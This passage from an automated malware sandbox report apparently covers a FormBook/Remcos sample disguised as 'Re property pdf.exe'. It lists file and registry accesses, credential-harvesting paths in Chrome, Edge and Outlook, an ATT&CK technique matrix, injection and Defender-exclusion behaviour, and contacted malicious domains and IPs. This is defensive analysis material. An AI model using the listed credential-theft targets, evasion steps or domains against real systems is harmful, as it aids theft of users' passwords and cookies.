            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeQueries volume information: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 6.2.Re property pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.Re property pdf.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.2172213068.0000000000A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2171525341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.4215060092.0000000005920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2173602365.0000000001320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.4212104548.0000000002730000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\PresentationHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\PresentationHost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 6.2.Re property pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.Re property pdf.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.2172213068.0000000000A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2171525341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.4215060092.0000000005920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2173602365.0000000001320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.4212104548.0000000002730000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Scheduled Task/Job            		1
            Scheduled Task/Job            		312
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		221
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            DLL Side-Loading            		1
            Scheduled Task/Job            		11
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            Abuse Elevation Control Mechanism            		41
            Virtualization/Sandbox Evasion            		Security Account Manager41
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            DLL Side-Loading            		312
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism            		Cached Domain Credentials113
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
            Software Packing            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            DLL Side-Loading            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1537675 Sample: Re property pdf.exe Startdate: 19/10/2024 Architecture: WINDOWS Score: 100 54 www.hcpf.xyz 2->54 56 www.whiterabbitgroup.pro 2->56 58 29 other IPs or domains 2->58 70 Suricata IDS alerts for network traffic 2->70 72 Malicious sample detected (through community Yara rule) 2->72 74 Sigma detected: Scheduled temp file as task from temp location 2->74 78 9 other signatures 2->78 10 Re property pdf.exe 7 2->10         started        14 hwOHPmqcegxcxb.exe 5 2->14         started        signatures3 76 Performs DNS queries to domains with low reputation 54->76 process4 file5 46 C:\Users\user\AppData\...\hwOHPmqcegxcxb.exe, PE32 10->46 dropped 48 C:\...\hwOHPmqcegxcxb.exe:Zone.Identifier, ASCII 10->48 dropped 50 C:\Users\user\AppData\Local\...\tmp4EB6.tmp, XML 10->50 dropped 52 C:\Users\user\...\Re property pdf.exe.log, ASCII 10->52 dropped 88 Adds a directory exclusion to Windows Defender 10->88 90 Injects a PE file into a foreign processes 10->90 16 Re property pdf.exe 10->16         started        19 powershell.exe 23 10->19         started        21 schtasks.exe 1 10->21         started        92 Multi AV Scanner detection for dropped file 14->92 94 Machine Learning detection for dropped file 14->94 23 schtasks.exe 1 14->23         started        25 hwOHPmqcegxcxb.exe 14->25         started        27 hwOHPmqcegxcxb.exe 14->27         started        signatures6 process7 signatures8 66 Maps a DLL or memory area into another process 16->66 29 uGMCFMVqKoR.exe 16->29 injected 68 Loading BitLocker PowerShell Module 19->68 33 WmiPrvSE.exe 19->33         started        35 conhost.exe 19->35         started        37 conhost.exe 21->37         started        39 conhost.exe 23->39         started        process9 dnsIp10 60 www.setsea.info 203.161.41.204, 49996, 50012, 50018 VNPT-AS-VNVNPTCorpVN Malaysia 29->60 62 b1-3-r111.kunlundns.top 129.226.56.200, 50048, 50049, 50050 TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN Singapore 29->62 64 7 other IPs or domains 29->64 96 Found direct / indirect Syscall (likely to bypass EDR) 29->96 41 PresentationHost.exe 13 29->41         started        signatures11 process12 signatures13 80 Tries to steal Mail credentials (via file / registry access) 41->80 82 Tries to harvest and steal browser information (history, passwords, etc) 41->82 84 Modifies the context of a thread in another process (thread injection) 41->84 86 2 other signatures 41->86 44 firefox.exe 41->44         started        process14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Re property pdf.exe92%ReversingLabsByteCode-MSIL.Trojan.Remcos
            Re property pdf.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe92%ReversingLabsByteCode-MSIL.Trojan.Remcos

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.fontbureau.com/designersG0%URL Reputationsafe
            http://www.fontbureau.com/designers/?0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.fontbureau.com/designers?0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.fontbureau.com/designers0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.fonts.com0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.fontbureau.com0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.fontbureau.com/designers/cabarga.htmlN0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.fontbureau.com/designers80%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.stopgazviganais.org
            		172.67.196.90
            		truetrue
              		unknown
